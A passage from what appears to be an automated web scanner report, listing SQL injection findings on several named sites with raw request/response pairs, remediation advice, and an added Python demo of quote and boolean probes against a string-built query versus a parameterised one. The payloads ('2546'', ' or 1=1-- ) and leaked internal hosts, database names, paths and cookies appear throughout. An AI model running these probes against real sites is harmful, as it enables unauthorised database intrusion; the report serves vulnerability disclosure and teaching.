</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1)<br>
...[SNIP]...

2.20. http://tours.sapha.com/ [scs_sid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_sid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the scs_sid parameter (2546'), and a MySQL syntax error was returned that echoes the statement (... where site_ID = '2546''). Two single quotes were then submitted (2546''), which MySQL reads as one escaped quote inside the string literal, and the syntax error disappeared, replaced by the application's generic "An error has occurred" page (the query was now syntactically valid but matched no site). That pair of behaviours is the signature of input embedded unescaped inside a SQL string literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses; the underlying fix is to bind scs_sid as a parameter of a prepared statement instead of concatenating it into the query string.

Request 1

GET /?scs_sid=2546'&scs_tid=-1+OR+17-7%3d10 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08; sapha_1_19=110363%7C2676569%7C2668748%7C2011-05-06+16%3A06%3A39

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:08:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 391

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '2546''<br>
<b>MySQL
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''2546''' at line 1)<br>
...[SNIP]...

Request 2

GET /?scs_sid=2546''&scs_tid=-1+OR+17-7%3d10 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08; sapha_1_19=110363%7C2676569%7C2668748%7C2011-05-06+16%3A06%3A39

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:08:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102

<html><body><h1>An error has occurred.</h1><p>Please contact support for assistance.</p></body></html>

2.21. http://tours.sapha.com/ [scs_tid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_tid parameter appears to be vulnerable to SQL injection attacks. The payloads 29377093'%20or%201%3d1--%20 and 29377093'%20or%201%3d2--%20 were each submitted in the scs_tid parameter, in both cases appended to a leftover cross-site scripting probe ('"--></style></script><script>netsparker(0x000074)</script>) that was already present in the parameter value. These two requests resulted in different responses (the generic "An error has occurred" page for the 1=1 case, the "Tour Unavailable" page for the 1=2 case), indicating that the input may be incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results, and the stacked XSS prefix here makes the comparison harder to interpret. The stronger evidence for this parameter is 2.22, where a bare single quote in scs_tid produces a MySQL syntax error. Retest with clean values (scs_sid=2546 and the 1=1/1=2 pair alone in scs_tid) and manually review the requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?scs_sid=2546&scs_tid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000074)%3C/script%3E29377093'%20or%201%3d1--%20&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102

<html><body><h1>An error has occurred.</h1><p>Please contact support for assistance.</p></body></html>

Request 2

GET /?scs_sid=2546&scs_tid=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000074)%3C/script%3E29377093'%20or%201%3d2--%20&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1022

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Tour Unavailable</title>
<style type="text/css">
   body{
       margin:0;
       padding:0;
   }
   a{
   color:#9E2626;
   }
   a:hover{
    text-decoration:none;
   }
   .left {
       float:left;
   }
   #container {
       width:640px;
       margin:50px auto 20px auto;
       padding:0;
   }
   #container #content {
       margin-left: 200px;
   }
</style>
</head>
<body>
   <div id="container">
       <img class="left" src="images/alert_175x162.gif" height="162" width="175" border="0" />
       <div id="content">
           <h1>Oops!</h1>
           <p>The tour you have requested does not exist or is not currently available. Please <a href="mailto:support@sapha.com" title="Sapha Support">contact support</a> if you feel you have reached this page in error.</p>
       </div>
   </div>
</body>
</html>

2.22. http://tours.sapha.com/ [scs_tid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://tours.sapha.com
Path:   /

Issue detail

The scs_tid parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the scs_tid parameter (2545'), and a MySQL 1064 syntax error was returned. The echoed statement (SELECT 1 FROM site_application t1 WHERE t1.site_application_isactive = 1 A...) shows scs_tid feeding a different query from the site_options lookup that scs_sid feeds in 2.19 and 2.20, so these are two distinct injection points behind the same front controller. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?scs_sid=2546&scs_tid=2545'&scscs=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:38 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 429

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT 1 FROM site_application t1 WHERE t1.site_application_isactive = 1 A
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
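
The tours.sapha.com findings 2.19 to 2.22 all come down to one pattern, which the echoed error text makes explicit: the request parameter is concatenated into the SQL statement as text. The following is an added example, not code from the report or from the target application, that reproduces that pattern against an in-memory SQLite database, runs the single-quote / double-quote probe from 2.20 and the 1=1 / 1=2 pair from 2.21 against it, and then runs the same probes against the parameterised form of the query so the difference is visible. The schema, the single row in it, and the function names are assumptions; the MySQL-only SQL_CACHE hint from the echoed statement is dropped because SQLite does not have it, and the quoting behaviour being demonstrated does not depend on it. The same probes apply unchanged to the single-quote findings against the other hosts later in this section.

```python
"""Error-based and boolean-based probing of a string-built query, and the parameterised fix.

Added example, not code from the report or from the target application. The report's error
text shows the statement `select SQL_CACHE * from site_options where site_ID = '<scs_sid>'`
being built by string concatenation; that pattern is reproduced here against an in-memory
SQLite database (the MySQL-only SQL_CACHE hint is dropped). Table contents are constructed,
and the function names are hypothetical.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the sapha_core site_options table, with one constructed row."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE site_options (site_ID TEXT PRIMARY KEY, site_name TEXT)")
    con.execute("INSERT INTO site_options VALUES ('2546', 'constructed example site')")
    return con


def lookup_vulnerable(con: sqlite3.Connection, scs_sid: str) -> list:
    """The pattern the error message reveals: the raw parameter is spliced into the SQL text."""
    sql = f"select * from site_options where site_ID = '{scs_sid}'"
    return con.execute(sql).fetchall()


def lookup_fixed(con: sqlite3.Connection, scs_sid: str) -> list:
    """Prepared statement with a bound parameter: the value never becomes SQL text."""
    return con.execute("select * from site_options where site_ID = ?", (scs_sid,)).fetchall()


def _raises_syntax_error(lookup, con, value: str) -> bool:
    try:
        lookup(con, value)
        return False
    except sqlite3.OperationalError:  # SQLite reports "unrecognized token" / syntax errors here
        return True


def probe_quote_pair(lookup, con, base: str) -> str:
    """The single-quote / double-quote test from finding 2.20.

    A bare quote breaks the string literal; a doubled quote is an escaped quote inside the
    literal and parses again. That asymmetry means the input sits inside a SQL string.
    """
    one = _raises_syntax_error(lookup, con, base + "'")
    two = _raises_syntax_error(lookup, con, base + "''")
    if one and not two:
        return "injectable"
    if not one and not two:
        return "not injectable"
    return "unclear: inspect the responses by hand"


def probe_boolean_pair(lookup, con, base: str) -> bool:
    """The ' or 1=1-- / ' or 1=2-- pair from findings 2.21 and 2.30.

    Returns True when the two payloads yield different result sets. Against a live site a
    difference can also come from timing, session state or an unrelated error page, which
    is why the report rates such findings Tentative; this in-memory database is deterministic.
    """
    true_rows = lookup(con, base + "' or 1=1-- ")
    false_rows = lookup(con, base + "' or 1=2-- ")
    return true_rows != false_rows


if __name__ == "__main__":
    con = make_db()
    for name, fn in (("string-built", lookup_vulnerable), ("parameterised", lookup_fixed)):
        print(name, probe_quote_pair(fn, con, "2546"), probe_boolean_pair(fn, con, "29377093"))
```

With the string-built query the quote probe reports "injectable" and the boolean pair returns different row sets (the 1=1 variant returns every row, the 1=2 variant none); with the bound parameter both probes are inert because the quote and the appended clause are simply part of the value being compared, and no site ID matches them.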

2.23. http://www.brownrudnick.com/nr/alertsArchv.asp [Year parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.brownrudnick.com
Path:   /nr/alertsArchv.asp

Issue detail

The Year parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Year parameter (Year=2006'), and a database error message was returned by the Microsoft OLE DB Provider for ODBC Drivers, i.e. the classic ASP page (IIS 5.0, MicrosoftOfficeWebServer 5.0_Pub) builds its query from the raw parameter. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft Access.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /nr/alertsArchv.asp?Year=2006' HTTP/1.1
Cookie: ASPSESSIONIDSSSASTRS=AOLLAMJAKHMOMMMNLJCHGNIN
Host: www.brownrudnick.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
Accept: */*

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 06 May 2011 18:47:11 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 13913
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQRDRRTT=LPGCALMBHBMDBAFEOEDHOHHC; path=/
Cache-control: private

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Brown Rudnick - Alerts and Newsletters -
...[SNIP]...
</i> Microsoft OLE DB Provider for ODBC Drivers<br>
...[SNIP]...

2.24. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter (id=8289'), and a MySQL 1064 syntax error was returned. The response also echoes the failing statement in a textarea and a PHP warning naming the script path (/home/chroot/home/james/safari/accommodation2.php, line 34), so display_errors is on in production. The backslash in the echoed token ('\'') indicates that the quote was escaped on the way in (magic_quotes_gpc or addslashes) and the statement still failed, which is what happens when the value is placed into the query unquoted, in a numeric position: escaping quotes does nothing for a value that is not inside a string literal. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses; turning display_errors off in production also stops the PHP warnings from revealing the script path. Escaping the quote is not the fix for a value used in a numeric position: cast id to an integer or bind it as a prepared-statement parameter.

Request

GET /accommodation2.php?id=8289' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:51 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10042

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/accommodation2.php on line 34
<html>
...[SNIP]...

2.25. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /accommodation2.php

Issue detail

The scanner labels this injection point "the name of an arbitrarily supplied request parameter", but the request shows the payload inside the id value (id=/1'8289), and the echoed error token ('/1\'8289') confirms it reached the same statement as 2.24, again with the quote backslash-escaped and still breaking the query. Treat 2.24 and 2.25 as one injection point rather than two. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /accommodation2.php?id=/1'8289 HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:44 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 10070

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/1\'8289' at line 1<br /><br /><textarea rows="10" cols="10
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/accommodation2.php on line 34
<html>
...[SNIP]...

2.26. http://www.caribbean-ocean.com/get-image.php [id parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

The id parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the id parameter (id=18696'), and a MySQL 1064 syntax error was returned. The response is served with Content-Type: image/jpg but its body is the HTML error text, the failing statement in a textarea, and two PHP warnings: mysql_num_rows() failing on get-image.php line 15, then fopen() failing to open the fallback image ../images/not-found.jpg. Together these disclose the script path (/home/chroot/home/james/safari/) and the script's fallback logic. As in 2.24, the escaped quote ('\'') still broke the statement, pointing to an unquoted numeric position. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /get-image.php?id=18696' HTTP/1.1
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.caribbean-ocean.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 16:00:06 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 934
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br /><br /><textarea rows="10" cols="100">SEL
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

2.27. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /get-image.php

Issue detail

As with 2.25, the scanner labels this "the name of an arbitrarily supplied request parameter", but the request shows the payload inside the id value (id=1/1'8696) and the echoed error token ('\'8696') shows it reached the same statement as 2.26; treat 2.26 and 2.27 as one injection point. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /get-image.php?id=1/1'8696 HTTP/1.1
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.caribbean-ocean.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 16:00:17 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Content-Length: 940
Content-Type: image/jpg

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'8696' at line 1<br /><br /><textarea rows="10" cols="100"
...[SNIP]...
</textarea>
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/get-image.php on line 15

Warning: fopen(../images/not-found.jpg): failed to open stream: No such file or directory in /home/chroot/home/james/safari/get-ima
...[SNIP]...

2.28. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Barbados%20Resort%20holidays/91

Issue detail

The REST URL parameter 2 (the trailing 91 in /luxury%20Barbados%20Resort%20holidays/91, which URL rewriting hands to countries2.php) appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a MySQL 1064 syntax error was returned. The echoed token ('\') ORDER BY area_name ASC') shows the value landing inside a parenthesised clause of the statement built at countries2.php line 267, with the quote backslash-escaped but the value itself unquoted, so the escaping does not protect it. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /luxury%20Barbados%20Resort%20holidays/91' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:35:57 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6887

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

2.29. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.caribbean-ocean.com
Path:   /luxury%20Jamaica%20Resort%20holidays/105

Issue detail

The REST URL parameter 2 (the trailing 105 in /luxury%20Jamaica%20Resort%20holidays/105) appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and the same MySQL 1064 error from countries2.php line 267 was returned, with the same echoed token ('\') ORDER BY area_name ASC'), so 2.28 and 2.29 are one injection point reached through different rewritten URLs rather than two separate flaws. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /luxury%20Jamaica%20Resort%20holidays/105' HTTP/1.1
Host: www.caribbean-ocean.com
Proxy-Connection: keep-alive
Referer: http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=lj6iq5k4nck6ah1gcn4059tnpc0iac0k

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:25 GMT
Server: Apache/2.2.4 (Linux/SUSE)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 6888

<html>
<head>
<title>Luxury and exclusive Caribbean holidays in luxury</title>

<meta name="keywords" content="Luxury Jamaica holidays, Tobago, Bahamas, luxury St Kitts, luxury St Vincent holidays, SD
...[SNIP]...
<br />

1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') ORDER BY area_name ASC' at line 1<br />
...[SNIP]...
</textarea>
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/chroot/home/james/safari/countries2.php on line 267

</div>
...[SNIP]...

2.30. http://www.dominionenterprises.com/main/do/Advertiser_Agreement [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dominionenterprises.com
Path:   /main/do/Advertiser_Agreement

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 35525155'%20or%201%3d1--%20 and 35525155'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /main/do/Advertiser_Agreement35525155'%20or%201%3d1--%20 HTTP/1.1
Host: www.dominionenterprises.com
Proxy-Connection: keep-alive
Referer: http://dominionenterprises.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1307317138614%26vn%3D1; s_ria=flash%2010%7Csilverlight%204.0; s_nr=1304725151554; s_lv=1304725151555; s_lv_s=First%20Visit; s_invisit=true; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:37:23 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=bdf614ab3757af735415e00061963d45; expires=Sun, 08 May 2011 19:37:23 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 06 May 2011 19:37:23 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Content-Type: text/html
Content-Length: 32708

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Home</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="description" content="Home">
   <meta name="keywords" content="Home">
   <meta name="copyright" content="Dominion Enterprises">
   <meta name="resource-type" content="document">
   <meta name="distribution" content="global">
   <meta name="author" content="">
   <meta name="robots" content="index, follow">
   <meta name="revisit-after" content="1 days">
   <meta name="rating" content="general">

<script language="javascript" type="text/javascript">
var IsIPad = false;
function QueryStringIsRequestFromMobile(DirectToFullSite) {
Queries = window.location.search.substring(1);
if (Queries == "" || Queries == null) {
return false;
}
else {
QueryArray = Queries.split("&");
for (i = 0; i < QueryArray.length; i++) {
QueryValue = QueryArray[i].split("=");
if (QueryValue[0] == DirectToFullSite) {
if (QueryValue[1] == "fs24lmj09")
return true;
